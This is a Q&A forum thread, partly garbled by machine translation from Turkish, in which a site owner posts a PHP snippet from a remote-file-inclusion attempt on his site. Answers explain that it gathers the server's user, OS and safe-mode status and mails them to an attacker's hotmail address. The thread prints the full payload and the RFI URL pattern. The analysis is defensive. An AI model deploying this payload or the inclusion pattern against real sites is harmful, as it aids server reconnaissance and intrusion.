scriptkiddie bu snippit ile web siteme sel

3 Cevap php

hey, birileri outthere bazı komut ile web siteme sel çalışıyor. luckly benim uygulama yakaladı

i just wanna bu kodu ne yaptığını biliyor

<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . " 

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905@hotmail.com";
$assunto = "lup@";
$email1 = "inbox200905@hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>

he was trying to do something like this: mysite/index.php?dll=http://www.forms.dgpj.mj.pt/box2.txt?

teşekkürler

3 Cevap

http://evilcodecave.blogspot.com/2009/08/rfi-malware-analysis-ascrimez-kit.html

This is a notification script, that is used ... to send notification mails to attackers, to find more vulnerable servers :)

EDIT: As Greg Hewgill pointed out in a comment, the fact that this has the potential to run, rapor için yararlı bir şey olsa bile, hafife alınmaması gereken bir husustur.

Gelecekte olası istismar kullanım için, "$ SafeMode" istatistikleri toplamak için çalışıyor gibi görünüyor:

...
$dados=("<b>Produto</b> = " . $UNAME . " // server/OS info
<i>Seguran?a</i> = " . $SafeMode . "     // is PHP safe mode off? on? what?
http://" . $delet . "                    // full request URI
...
$email = "inbox200905@hotmail.com";      // who is harvesting
...
if(mail($email1,$assunto,$dados,$headers)){ // harvest via. mail

Dolt geri ayağa baktı kullanıcıyı posta başarısız. Zayıf sos.

Bu script sadece inbox200905@hotmail.com adresine bazı bilgi toplama ve gönderme gibi görünüyor:

  • Sunucuda php komut çalıştırır kullanıcı Adı
  • Sunucu üzerinde yüklü işletim sistemi, Adı
  • php safe mode etkindir
  • Ayrıca kendi url ve komut adı

Ben bu script sadece saldırı için kullanılabilecek sunucuları bulmak için kullanılır düşünüyorum.